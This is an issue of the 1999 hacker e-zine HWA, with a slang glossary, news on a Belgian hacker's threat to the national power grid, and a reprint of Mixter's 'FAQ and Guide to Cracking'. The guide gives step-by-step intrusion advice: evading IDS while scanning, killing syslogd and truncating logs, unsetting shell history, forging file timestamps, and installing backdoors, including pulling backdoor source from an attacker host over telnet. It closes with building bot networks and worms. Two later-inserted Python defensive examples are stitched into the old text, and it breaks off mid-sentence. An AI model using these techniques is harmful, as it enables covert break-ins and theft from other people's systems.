~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for?
never mind, if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pigeon-holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Steven Levy's HACKERS anymore. BTW to all you up and comers, I'd highly recommend you get that book. It's almost like buying a clue. Anyway..on with the show .. - Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed below: Some are very useful, others attempt to deny any possible attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written as =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one??
*CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)

FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;)

du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER - Read Steven Levy's HACKERS for the true definition, then see HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or 'can you hax0r some bread on the way to the table please?'
         2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;&

HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00 - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI - Missing on/from IRC

NFC - Depends on context: No Further Comment or No Fucking Comment

NFR - Network Flight Recorder (Do a websearch) see 0wn3d

NFW - No fuckin' way

*0WN3D - You are cracked and owned by an elite entity see pheer

*OFCS - Oh for christ's sakes

PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
        Alternates: H - hacking, hacktivist
                    C - Cracking
                    V - Virus
                    W - Warfare
                    A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                    P - Phreaking, "telephone hacking" PHone fREAKs ...
                    CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d

*RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass.

TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA - To Be Arranged/To Be Announced also 2ba

TFS - Tough fucking shit.

*w00t - 1 - Reserved for the uber ereet, no one can say this without severe repercussions from the underground masses. also "w00ten"
        2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf - what the fuck, where the fuck, when the fuck etc ..

*ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but I'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee I'll take any notice mind you, but send in your thoughts anyway.

* all the people who sent in cool emails and support

FProphet  Pyra  TwstdPair  _NeM_  D----Y  Dicentra  vexxation  sAs72  Spikeman  p0lix  Vortexia  Wyze1  Pneuma  Raven  Zym0t1c  Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick

kewl sites:

+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always popular..." - FProphet '99

+++ When was the last time you backed up your important data?

Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(No mail worthy of posting here this issue,)

Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh? I'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up...
==============================================================================

02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf("Read commented source!\n\n");

    /*
     * Forbidden Knowledge has released #7, our props to the FK crew and 2600ZA,
     *
     * SLa5H is back with news and views from .hr
     *
     * this issue is a little delayed as i'm getting used to a new keyboard, and
     * i've been sick with a bad cold...anyway the hardware...
     * natural style keyboard by Micro innovations, its a wicked awesome keyboard
     * but my typing speed has to adjust from the trashy standard keyboard I was
     * using. i've added a 17 Gig HD to the 10 Gig thats already in my main server
     * to go online at some point too and got myself some new cpu speakers ...
     *
     * Cruciphux
     */

    printf("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main address:

hwa@press.usmc.net

complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

03.0 The Real ReDATtAck poised to Attack Belgium?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Zym0t1c,

September, 28th 99 - A hacker who claims to be the real Redattack plans to shut down all the electricity in Belgium for about three hours tomorrow (29th). It'll take place from 1.30pm till 4.30pm. It'll last three hours because the generators of hospitals and the airport of Belgium can provide electricity for four hours and he doesn't want anyone getting killed. He claims to have hacked Electrabel (Belgian electricity provider) and Belgacom (the biggest telephone company of Belgium (remember also ISP Skynet?)). He will also release some secret phone numbers of Belgacom clients and Proximus (cellular phone section of Belgacom) on the Internet (however no site was mentioned).
Since the original ReDaTtAcK was more a mediawhore than a hacker (considered by the hacking ethic), this new Redattack took his name, so he claims... And if the government still doesn't take actions against crimes (?!!??) like these, he will shut down the whole country next week. We'll see... Is this a game of 'who's the best Belgian hacker?' I hope not, because real hackers sometimes suffer because of these (sorry) idiots.

Also today - The original ReDaTtAcK claims to have hacked Planet Internet, also one of the biggest ISP's of Belgium. He could see some encrypted VISA-numbers and some client information. Planet Internet has increased their security. They press no charges against him. ReDaTtAcK also claims to have found an underground childporn network of a school in Belgium. He gave the information to the police of Gent, but they say his information was incomplete and maybe incorrect.

Update
~~~~~~~

The original ReDaTtAcK will be RA1. The second, so called 'real' Redattack will be RA2, okay? :)

Sept, 29th 1999 - Belgium

First of all, yesterday I wrote that RA1 claimed to have found an underground child porn network... Well, nothing of that is true, so say the authorities. RA1 just acted as a little girl on a chatroom and drew the attention of a man. The man wanted to settle a little appointment between the two of them... Therefore, RA1 gave the information to the authorities assuming he had found a network. The police says RA1 exaggerated, although there might follow an investigation...

Second, RA2 mailed our newspapers yesterday saying he was impressed by the added security of Electrabel (Belgian electricity provider). He will not shut down the electricity but he will just try to break into the system and leave a logo or something. The IT-staff of Electrabel is rather relaxed about it. They claim their security system is unique, because they invented it, and it uses a system that practically no-one knows how to use, except the IT-staff of Electrabel of course.
So, if he hacks the system, he first needs to learn to use the system before he can actually do something... They are interested in the vulnerabilities of their system and hope that if RA2 succeeds, he will explain the holes found in their system.

/** I've also heard of a few people that RA1 has offered his services to Electrabel to secure their system. I haven't read it or heard it on the radio, it's just what I've heard (maybe rumours), so I cannot prove it. Are they really playing a game of who's the best or who gets the most media attention? **/

The newspaper wrote also that they think RA2 was exaggerating about his skills. Two days ago he was so sure about hacking this computer and see what happens now: he pulls back. "When I cannot hack the system, I will make positive publicity about their security system.", says RA2. Jeezes man! :))

Third, Belgacom (biggest Belgian phone service provider) is pressing a charge against RA2. He claimed to kill all phonelines in Belgium and to publish secret phone and GSM numbers on the Internet. Well, there actually was a list with some phone numbers on the Internet, so people thought he really hacked Belgacom's system and copied the list. Guess what??? He published some phone and GSM numbers from Advalvas.com. The numbers were from people who registered for an email address and left their phone and GSM numbers... :) Because of the fact that RA2 threatened with criminal facts like killing the phone lines and publishing secret numbers, Belgacom pressed a charge against unknown people (referring to RA2, although they just know he's 22 and he's an IT'er). Since there has been a charge against him, the police could trace him. We'll see...

I also added the newspaper article of the same newspaper 'De Standaard' and it's again in Dutch! Sorry for this! :)))

zym0t1c@ping.be

HNN's Coverage;

Belgium Electric Company Threatened by Cyber Intruder

contributed by Maxim.Glory

Belgian electricity provider Electrabel has been threatened by an unknown assailant. The cyber intruder has threatened to turn off all power in the country sometime between 1:30 and 3:30 pm CET on Wednesday. According to an Electrabel spokesperson the system controlling Electrabel's distribution of power is custom made and the connections are therefore extra protected. (Oh yeah, security through obscurity, that always works.)

Svenska Dagbladet - Swedish
http://www.svd.se/paper.asp?menu=/dynamiskt/huvudmeny/did_276436.asp&main=/dynamiskt/senaste_nytt/did_277456.asp

Excite News
http://news.excite.com/news/r/990928/08/odd-hacker

Electrabel
http://www.electrabel.be/

Late Update 0830

contributed by Yaxmon

Minutes after we went to press HNN learned that the attacker who goes by the name ReDaTtAcK 2, has withdrawn his threat and now says that he will not be turning off the power. (Of course now people will wonder if he ever could have and this person who did nothing more than make a phone call will forever be labeled as a 'hacker'. Thanks.)

Reuters
http://www.reuters.com/news/oddly_enough/

Excite;

Hacker Threatens To Leave Country In The Dark

Updated 8:10 AM ET September 28, 1999

BRUSSELS (Reuters) - A computer hacker has threatened to break into the computers of Belgian electricity generator Electrabel Wednesday afternoon and halt the power supply to the entire country.

"Tomorrow I will leave Belgium without power, and that is not so difficult," the anonymous hacker told the Belgian newspaper Het Laatste Nieuws. "Wednesday I will get into Electrabel's computers between 1:30 and 3:30 in the afternoon and shut down all the electricity," the hacker said.

Electrabel, which has a virtual monopoly on Belgium's electricity market, said it was taking the threat seriously but felt that the hacker had little chance of succeeding.

"There is very little chance that Belgium could be without power," Electrabel spokesman Phillipe Massart told RTBF television. "Nonetheless, the risk that someone could access the system always exists."

Massart said the systems that pilot Electrabel's power distribution were developed specifically for the company and have protected connections. He said the company was taking measures to ensure its security.

Hacker Changes Mind About Switching Off Country

Updated 9:55 AM ET September 29, 1999

BRUSSELS (Reuters) - A computer hacker has backed down from a threat to break into the computers of Belgian electricity generator Electrabel Wednesday afternoon and cut the nation's power supply, Electrabel said.

The hacker, who calls himself ReDaTtAcK 2, phoned Electrabel, which has a virtual monopoly on Belgium's electricity market, to withdraw the threat.

"I had this guy on the phone," spokesman Patrick De Vos told Reuters. "He withdrew his threat. It's a non-event."

The hacker launched a crusade earlier in the summer, attacking Web sites in an attempt to alert Belgium to the security risks of the Internet. De Vos said the hacker had threatened to break into Electrabel's computers to prove the system's vulnerability.

"He would like to try and find a hole and insert his business card and say this is a failure in the system," De Vos said. He said the company had taken the threat seriously but did not believe its system had ever been at risk.

@HWA

04.0 FAQ and Guide to Cracking by Mixter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://blacksun.box.sk/

-----BEGIN PGP SIGNED MESSAGE-----

FAQ and Guide to Cracking (c) 1999 by Mixter

Disclaimer: This is a theoretical instruction to cracking and for informational purposes. It should be seen as an introduction to the methods and strategies used by crackers rather than a howto.
The author is not suggesting to perform illegal actions and cannot be held liable for any actions of other individuals who perform any of the actions discussed in this paper and possible resulting damage.

Introduction:

I am going to describe the methods and strategies used to access various UNIX hosts among the internet unauthorizedly. This guide will not teach you how to hack, neither do you have to be a hacker to use the techniques described here. Hacking means finding your own way to do it, and finding new approaches to accomplishing something. I am only going to supply you with one possible approach to cracking.

I. Prerequisites

Operating System:

You certainly need Unix installed on your home computer. WINDOWS WILL NOT DO IT. I'm not going into details here, but you should take either Net/Open/FreeBSD or Linux because they are POSIX compliant, suitable for Home PC's and most small network tools will compile on them. If you use Linux [1], you should not use the RedHat, SuSE, or Slackware distributions unless you know how to secure them properly. Local root compromise can be fatal as you may reveal your identity.

Basic Knowledge:

Get experienced in the use of the following tools. Use the 'man' command, and work with them until you fully understand them. These tools are:

awk cat chmod dd grep gzip kill ln ls mail mknod more mount ping ps sed sort tar ifconfig ipfwadm last head tail gcc cut find ftp less vim nc (netcat) rcp xhost xterm syslogd inetd telnet ssh finger

Security requirements:

You need to make sure that no one can compromise your own host. Check security sites to make sure your daemons (servers) are not exploitable. Do not allow anyone to use your box. Disable telnet, rlogin, and whatever you don't need yourself. Ideally, you do not run any servers at all while you are attacking other hosts. Consider encrypting directories and/or complete partitions with encrypted file systems and encrypt emails and files you transfer with PGP. [2]

Account:

For your activities, you require an ISP account with a direct connection, which normally all ISPs provide. You might want to consider not doing any 'cracking' activities from your home at all, in which case you need a fast linux or bsd shell account, which must not be from a commercial shell provider (esp. those who sell eggdrop and irc accounts), and if you use a university account, you need to make sure that they do not watch / monitor their users. If you use a dialup, ensure yourself that no transparent proxies or network monitors (squid etc.) are being run by your provider. Do a traceroute and check your provider's backbone routers for NIDS (Intrusion Detection), network monitors, proxies, and anything that seems unusual; alternatively let someone with more knowledge do it.

II. Scanning

Avoiding track-downs:

Where you scan from is up to you. Whatever you do, don't scan from your dialup while using a legit internet account. Everyone knowing your IP is a phone call to your provider away from knowing your identity. If you use fake accounts, avoid using fake or stolen credit cards to make them. Also avoid using 1-800 numbers at all costs, because the 1-800 nodes generally log every calling phone number with access time. Inquire about the ISP you use to make sure he is not in explicit cooperation with federal agencies. Additionally, do not stay longer than 5 (in words: five) hours on the internet without hanging up and reconnecting. Why? If you are logged on, the node has your account associated with your current dynamic IP address for obvious technical reasons, and they also might be able to trace you. Most nodes will not keep a table of which IP belongs to which account once they disconnected, especially on huge ISPs where this would take large additional resources. I do not recommend traversing through WinGate and SOCKS servers, because they give you a fake feeling of safety.
Often, these servers are logging every access and sometimes they are put up by federal agencies themselves. You should ideally relay your connections through a server you have root, hence full control, on, using datapipe, bnc, ssl, or a wingate/socks server with logging completely disabled.

Stealthy scanning:

A scan not being noticed is a successful scan. Half-Open (SYN) scans are lame, because many daemons will still report a "warning: can't get client address: Connection reset by peer" or similar message, then have someone turn on a sniffer or tcplogd and they see who is scanning them. Advanced and recommended scans are NUL (tcp packet without any flags), XMAS (ack/syn/rst probe), and Maimon scans, which can be done with nmap [3]. If you use connect() scans, which are much more reliable, then use lscan, and get the version info. This generally makes the most sense because you have to get the daemon's versions anyway to see if it is exploitable.

Play dead:

As you scan, I strongly recommend disabling every single service on the machine you're scanning from and setting packet filtering rules. This will fool the hosts being scanned into thinking your host is down and the scan is spoofed. A few things you should disable:

* Inetd ( identd, finger, ftp, telnet )
* All INCOMING tcp connection requests (ipfwadm: -y flag)
* ICMP Timestamping, Echo reply, Query (ICMP types 8/13/15/17)
* UDP Traceroute queries (udp port range 33400-33500)

Also note that -deny is better than -reject, which would send an ICMP unreach packet back instead of keeping totally silent.

Non-sequential scanning:

This is important: Use non-sequential scanning to avoid intrusion detection systems. An IDS or NIDS is installed on a gateway or router and monitors unusual traffic to certain ports. If you scan 1.1.1.1, 1.1.1.2 .. 1.1.1.255, 1.1.2.1 etc., an intrusion detection system can detect your scan against 1.1.1.*. Instead, scan like this: 1.1.1.1, 1.1.2.1 .. 1.1.255.1, 1.1.1.2 You get the point.
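From the defender's side of the point above, this is an added example (not part of Mixter's text) that contrasts an IDS check keyed on consecutive destination addresses, which the column-wise scan walks straight past, with a detector that only counts distinct destination hosts per source and port inside a time window and therefore does not care about ordering. The log format, addresses and thresholds are all constructed for the example.

```python
"""Order-blind sweep detection versus a consecutive-address check.

The guide claims an IDS that watches for 1.1.1.1, 1.1.1.2, ... misses a
scan that walks the third octet instead (1.1.1.1, 1.1.2.1, ...).  Both
detectors below run over the same constructed log lines so the
difference is visible.
"""
from collections import defaultdict
import ipaddress
import re

# Constructed packet-filter log format: "<epoch> <src> -> <dst>:<dport>"
LOG_RE = re.compile(r"^(\d+) (\S+) -> (\S+):(\d+)$")


def parse(lines):
    """Yield (ts, src, dst, dport) tuples, silently skipping malformed lines."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts, src, dst, dport = m.groups()
        yield int(ts), src, dst, int(dport)


def consecutive_detector(events, run_len=5):
    """Naive IDS: alert only when one source hits run_len numerically
    consecutive destination IPs on the same port, one after another."""
    alerts = set()
    last = {}  # (src, dport) -> (previous dst as int, current run length)
    for _, src, dst, dport in events:
        cur = int(ipaddress.ip_address(dst))
        prev, run = last.get((src, dport), (None, 0))
        run = run + 1 if prev is not None and cur == prev + 1 else 1
        last[(src, dport)] = (cur, run)
        if run >= run_len:
            alerts.add((src, dport))
    return alerts


def distinct_host_detector(events, threshold=5, window=60):
    """Order-blind detector: alert when one source touches `threshold`
    distinct destination hosts on one port within a `window`-second bucket.
    A scan that hops across subnets counts exactly like a sequential one."""
    alerts = set()
    seen = defaultdict(set)  # (src, dport, window bucket) -> {dst}
    for ts, src, dst, dport in events:
        key = (src, dport, ts // window)
        seen[key].add(dst)
        if len(seen[key]) >= threshold:
            alerts.add((src, dport))
    return alerts


def column_scan_log(src="203.0.113.7", dport=110, start=1000):
    """Constructed log: one probe to 10.20.N.1 for N = 1..8 (third octet walks)."""
    return [f"{start + i} {src} -> 10.20.{i}.1:{dport}" for i in range(1, 9)]


def row_scan_log(src="203.0.113.8", dport=110, start=2000):
    """Constructed log: the sequential sweep 10.20.1.1 .. 10.20.1.8 the naive IDS expects."""
    return [f"{start + i} {src} -> 10.20.1.{i}:{dport}" for i in range(1, 9)]


def compare(lines):
    """Run both detectors over the same log and return their alert sets."""
    events = list(parse(lines))
    return {
        "consecutive": consecutive_detector(events),
        "distinct": distinct_host_detector(events),
    }


if __name__ == "__main__":
    for name, log in (("column scan", column_scan_log()), ("row scan", row_scan_log())):
        print(name, compare(log))
```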
What to scan:

Most crackers resolve a top-level domain like .com .net or a country like .ee .se .ch etc. using z0ne or axfr from ADM [4], or by using a simple recursive shell script. host -l domain will not do for a scan, because you'll miss all the subnets that way, and there are plenty of them. However, I'd rather suggest scanning complete IP blocks. Depending on your greed, you can either scan a class B (1.1.*.*) or class A (1.*.*.*) network.

You might wish to obtain some information about your targets first. To do this, you can query whois.arin.net, the registration center for IP addresses. Lets say you want to scan 192.168.*.* and you want to know who owns that IP block. Type:

whois -h whois.arin.net 192.168.0.0

or

whois 192.168.0.0@whois.arin.net

and you get a short description of the owners of that netblock. If arin.net doesn't find any information, don't scan it, because the IPs are probably not yet in use.

Some info on the 'whois' results...

Maintained by RIPE.NET  = European (no, uk, ch, at, de, se, dk, etc.)
Maintained by APNIC.NET = Asian (id, kr, za, ee, tr, li, kh, etc.)
Maintained by NIC.xxx   = Belonging to country xxx

Finding vulnerable hosts:

First rule of scanning is: never delete your scan logs. If you think you are completely done with evaluating your logs, then compress, encrypt and store them, don't delete them. New security vulnerabilities will be found sooner or later, then you won't have to scan it all again. From my experience, the vulnerability scanners are almost all bullshit, you don't need them. Use grep and awk to extract the IP numbers from your scan logs, like this...

grep "QPOP" port110.log | grep "(version 2.2)" | awk '{print $1}' > 0wn.txt

(presuming that your scanner logs like this: " - ")

There are a couple of cases where you need an additional scan to find vulnerable versions, which are:

Buggy Daemon     Scanner                                   Scans for...
wu-ftp BETA-18   wuftpscan/ben (private)                   Writable dir
portmap          rpcinfo -p (unix tool)                    Portmap Version
ttdbserver       rpcinfo                                   ttdb version
rstatd           statdscan                                 rstatd version
mountd           mountdscan (rootshell)                    mountd/nfs version
bind             binfo-udp (rootshell), nscan (my site),   bind version
                 mbind (private)

III. Rooting

Lets think about the first commands you issue. They should:

1. Discreetly remove traces of the root compromise
2. Gather some general info about the system
3. Make sure you can get back in
4. Disable or patch the vulnerable daemon(s)

Here are my suggestions...

1. killall -9 syslogd klogd - pesky loggers! only few admins will notice if they get turned off. Now you can act freely. copy secure.1 and messages.1 from /var/log over secure and messages. Normally, these logs are the only ones with the intruder's IP and traces of a root compromise in them. If *.1 doesn't exist, truncate the files. Also, unset HISTFILE is important. Nobody does unset HISTFILE, thus leaving a .bash_history in /var/named or even /. Very unprofessional :).

2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf... Inform yourself about the frequency the system is being maintained, administrated, if the logfiles are being analyzed.

   * Look how many people have access to it (/etc/passwd) - the more the better for you (keeps attention away from you).
   * Look if the system is already backdoored!! you might want to remove other backdoors.
   * Look for a loghost or snmp (dangerous because you can't manipulate the logs on a far-away loghost).

   Watch out for *logd, sniffers, netmon's etc before you do anything great on the host. If you are paranoid, traceroute the host, and see if non-routers are before that host (probably IDS, loghost, sniffer, etc).

3. This is important: DONT MANIPULATE THE SYSTEM CONFIGURATION! DOH! It is too easy to detect you if you add yourself to /etc/passwd, or open a port by manipulating inetd.conf.
   Let me tell you that root kits and /bin/login trojans are the first things
   any sane admin will watch for. Install a nice stealthy port backdoor. My
   approach to uploading files is doing:

     (on your box)
     $ uuencode -m backdoor.c backdoor.c | less

     (on the target box)
     uudecode
     # cc -o backdoor backdoor.c

   A nice different method is putting a daemon on your own box, on port 666,
   that spits out the source code when someone telnets to it, so you can do

     telnet ppp-42.haxor.net 666 > backdoor.c

   As I said, make sure you can get back in. If the box you rooted has an
   uptime of more than 300 days or so, you might consider not installing the
   backdoor for startup. Instead, kill the vulnerable daemon, and when the
   host restarts, come back using an exploit. Normally, you can replace a lame
   daemon that nobody uses with your backdoor. Look at inetd.conf to see what
   daemons are active. A safe bet is in.talkd which often is activated but
   seldom ever used. So, when you want to re-activate your backdoor, talk
   root@0wned.host.com for a second, and your backdoor is running. You can
   also add /path/to/backdoor to /root/.profile.. but it is a bit riskier than
   the inetd backdoor method.

4. Subscribe to bugtraq, CIAC security list, or look at rootshell, to see what
   you need to do to patch your buggy stuff. If RPM is installed you can try a

     rpm -U ftp://ftp.cdrom.com/rightdir/daemon.rpm

   If not, use ncftp to fetch the file anonymously, because it doesn't need
   user interaction. If you want, add an additional backdoor in your "patched"
   server. QPOP 2.53 even supports this itself.

   For all files you replace, you should modify the time stamps, which won't
   help if the admin uses tripwire or cksum, but if the admin is, like most
   admins, a complete lamer that does find / -ctime to scan for trojans and
   thinks he knows his job. :P To modify timestamps, you do a simple:

     touch -r /bin/bash /path/to/your/trojan

   This will copy the exact date/time info from /bin/bash over your freshly
   added trojan. Voila!
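The article concedes that copied timestamps do nothing against tripwire or
cksum. The following added example (editor's code, not part of the original
article) shows that point from the admin's side: a scan for recently modified
files misses a replaced binary once its mtime has been copied from a clean
file, while a stored content digest still flags it. Every path and file body
below is constructed inside a temporary directory; the `bin/bash` and
`bin/login` names are stand-ins, not real system files.

```python
"""Content-hash integrity check versus an mtime-only "recently modified" scan.

Added example (not from the article): a defender's counterpoint to the
timestamp-forging note. Copying another file's mtime defeats a scan for
recently modified files, but not a stored content digest. Every file name
and file body below is constructed for the demonstration.
"""
import hashlib
import os
import shutil
import tempfile
import time

DAY = 86400


def sha256_file(path):
    """Return the hex SHA-256 digest of a file's contents."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def walk_files(root):
    """Yield (relative posix path, absolute path) for every regular file."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            yield os.path.relpath(path, root).replace(os.sep, "/"), path


def build_baseline(root):
    """Record a content digest for every file; this is the trusted reference."""
    return {rel: sha256_file(path) for rel, path in walk_files(root)}


def recently_modified(root, since):
    """The weak check: files whose mtime is newer than `since` (find -mtime style)."""
    return sorted(rel for rel, path in walk_files(root)
                  if os.stat(path).st_mtime > since)


def changed_by_hash(baseline, root):
    """The strong check: files whose current digest differs from the baseline."""
    return sorted(rel for rel, digest in baseline.items()
                  if sha256_file(os.path.join(root, rel)) != digest)


def demo():
    """Replace a binary, forge its mtime from a clean file, run both checks.

    Returns (mtime_scan_hits, hash_check_hits).
    """
    root = tempfile.mkdtemp()
    try:
        bindir = os.path.join(root, "bin")
        os.makedirs(bindir)
        old = time.time() - 400 * DAY  # pretend the system was installed long ago
        for name in ("bash", "login"):
            path = os.path.join(bindir, name)
            with open(path, "wb") as fh:
                fh.write(b"ORIGINAL " + name.encode())  # constructed stand-in for a binary
            os.utime(path, (old, old))
        baseline = build_baseline(root)

        # Simulate the replacement of login followed by copying bash's
        # atime/mtime onto it, which is what `touch -r /bin/bash login` does.
        login = os.path.join(bindir, "login")
        with open(login, "wb") as fh:
            fh.write(b"TROJANED login")
        st = os.stat(os.path.join(bindir, "bash"))
        os.utime(login, (st.st_atime, st.st_mtime))

        since = time.time() - 1 * DAY
        return recently_modified(root, since), changed_by_hash(baseline, root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())  # ([], ['bin/login'])
```

The baseline has to be taken while the system is known-good and kept off the
host (or on read-only media), otherwise whoever can replace a binary can also
rewrite the digest list.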
The alternative to all this for lazy people is to add an ipfwadm rule that
prevents traffic from the outside (-W eth0) to the ports with the buggy
daemons, and adding that command to a rc.d script as well. Bind doesn't need
tcp port 53 for anything except zone transfers and the RoTShB/ADM bind
exploits. It works fine with 53/tcp firewalled. But be aware that this might
get you detected, let's say if you disable port 110 or 143 on an ISP's central
mail exchange server...

About your backdoor:

Port > 10000 is strongly recommended, also a backdoor using UDP, ICMP, or even
something as unusual as raw IP is very useful. People that bind /bin/sh to a
port are idiots, because they open that host to everyone, letting in sniffers,
and probably other people who may damage the host seriously. Make sure to
password protect everything that runs as root. A password of a minimum length
of 8 characters, because you have no way of detecting a brute force attack.
For the C programmers, let me say, listen(sockfd,1). Maybe 2 connections, but
not more. For comfortability, you can add some stuff you want to occur on each
successful backdoor login, like system("w"), system("killall -9 syslogd
klogd"), or whatever. If you want a front-end backdoor with some integrated
functions, try gateway[5].

IV. UTILIZING COMPROMISED SYSTEMS

About your activities:

Do what you desire, but never without disregarding stealthiness. If you stop
checking log files, processes, or start something like ping -s 1024 -f cert.org
un-stealthed, it is, depending on the admin, a matter of hours or days until
you lose the host. Most of the time, losing a host means you cannot get access
again, and the admins will examine their system with extreme scrutiny; if they
are too lame, they might contact some external security experts or even the
Computer Emergency Response Team. Never do serious damage to the system, when
you don't have to - and trust me, you won't.
Damaging a system by altering vital system files, replacing frequently-used
programs or even destroying information is unintelligent, will not do you any
good, and will maybe assist you in getting new enemies. And it is trivial to
mention not to deface web sites...

World domination:

As the number of systems you control increases, you might want some kind of
easy remote control, utilization for attacks, and detection of detection of
your activities. You can install newnick bots or eggdrop bots with fancy
scripts which can be controlled through IRC to make life easier (make sure to
sit and think before you consider doing anything big with them on IRC!). You
can make your own inter-linked network of root systems, in which case you need
to start programming because no one will release such a program to the
public. :) You can make little packages with spoofing flooders, smurf and the
like, if you decide on becoming a packet warrior (then again, it won't help
you accomplish anything but getting irc channels or shutting down government
sites...). Alternatively, you can use every root you get to scan new
netblocks, and have the information mailed to you or whatever. You can make an
internet worm like ADMw0rm [4], B4b0w0rm, millennium worm (the last 2 are
private), and install them on your roots; make sure it is well constructed and
bug-free... If you are a creative person, you can make them scan large amounts
of ISP dialup netblocks for back orifice, netbus server, backdoor G, and what
not, and write something that controls their computers to spread more trojans,
send their mail to you, get their passwords, flood, scan, invade their private
lives... no wait, that's the government's job.

V. YOUR PRESENCE ON THE NET

Smart behavior and senseless behavior:

What you do besides cracking, mostly happens on IRC. IRC should be seen as a
tool for getting in touch with other skilled persons and exchanging thoughts
and information.
To avoid wasting your time, skills, and possibly getting busted, here are some
things which you SERIOUSLY should not be doing:

1) Warez. Stay away from warez, it is a waste of time. Warez ruins productive
   people and makes software expensive. Besides the moral bullshit, you can
   always get something you really need (#1 net game, enterprise application
   etc.), and you don't need much, trust me. Almost everything security /
   hacking related is free. Joining a warez group gets you a) a lot of vhosts
